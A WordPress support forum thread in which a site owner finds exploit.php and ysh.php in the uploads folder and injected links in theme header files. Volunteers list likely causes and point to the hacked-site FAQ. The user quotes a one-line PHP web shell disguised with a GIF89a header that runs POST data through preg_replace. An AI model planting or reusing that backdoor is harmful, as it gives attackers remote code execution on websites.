Title: exploit.php in New WordPress Install Last modified: August 24, 2016 --- # exploit.php in New WordPress Install * [Aventador](https://wordpress.org/support/users/aventador/) * (@aventador) * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/) * Today a file called exploit.php was uploaded in a freshly installed WordPress site, into the wp-content/uploads directory, how is that possible…? Viewing 3 replies - 1 through 3 (of 3 total) * [catacaustic](https://wordpress.org/support/users/catacaustic/) * (@catacaustic) * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067681) * Could be many ways. Off the top of my head, theres… - Using an older version of WordPress with a known vunerability (even 4.2 that was released only a short time ago has been upgraded to 4.2.1 to cover a new exploit that was found). - A plugin or theme that uses some sort of insecure forms, or scripts. Impossible to say without knowing exactly what your site is running. - Insecure file permissions on your server allowing other users to place files inside your file system. - A compromised server / web server software / firewall / other software or hardware issues. * There’s no one option, and no easy way ot find out what it was. The best thing that you can do is aks your hosting company to confirm how that file was placed there in the first place. That’s the only real way to see where a possible weak point could be, otherwise you’re just trying to plug holes that may or may not be there. * Thread Starter [Aventador](https://wordpress.org/support/users/aventador/) * (@aventador) * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067887) * I think I can set permissions for the uploads directory with Filezilla, but which settings are the right ones, so only admins can upload stuff through WP…? * Yesterday, a file called ysh.php was uploaded to the /wp-content/uploads directory, and it looks like this: `GIF89a?china-ysh ""){@preg_replace("/[ checksql]/e",$_POST['err'],"saft");}?>` * And today, the Twenty Thirteen, Twenty Fourteen and Twenty Fifteen themes were injected with this code in the header.php file: `http://pocketrealty.ca/tvrzrqfg. php?id=171528%5c` * – Thanks. * [catacaustic](https://wordpress.org/support/users/catacaustic/) * (@catacaustic) * [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067889) * Your site has been hacked. * You should read [this page](https://codex.wordpress.org/FAQ_My_site_was_hacked) and follow the directions as this will help you to guard against this in the future. Viewing 3 replies - 1 through 3 (of 3 total) The topic ‘exploit.php in New WordPress Install’ is closed to new replies. ## Tags * [exploit](https://wordpress.org/support/topic-tag/exploit/) * [php](https://wordpress.org/support/topic-tag/php/) * [wp-content](https://wordpress.org/support/topic-tag/wp-content/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 3 replies * 2 participants * Last reply from: [catacaustic](https://wordpress.org/support/users/catacaustic/) * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/exploitphp-in-new-wordpress-install/#post-6067889) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics